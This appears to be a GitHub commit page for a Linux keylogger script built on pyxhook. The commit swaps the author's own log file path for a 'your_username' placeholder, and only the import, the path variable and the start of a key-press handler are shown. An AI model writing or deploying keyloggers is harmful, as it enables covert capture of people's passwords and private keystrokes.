Skip to content

Commit

Permalink
updated default log info
Browse files Browse the repository at this point in the history
  • Loading branch information
GiacomoLaw committed Dec 18, 2016
1 parent d430f8c commit 8456911
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions linux/keylogger.py
Original file line number Diff line number Diff line change
@@ -1,8 +1,8 @@
import pyxhook

# This tells the keylogger where the log file will go (where characters are logged). Change it as is needed.
# Redirects to what would be my desktop. This won't exist on yours, so you need to change it. :)
log_file = '/home/Giacomo/Desktop/file.log'
# Change `your_username` to your account name.
log_file = '/home/your_username/Desktop/file.log'


def OnKeyPress(event):
Expand Down

0 comments on commit 8456911

Please sign in to comment.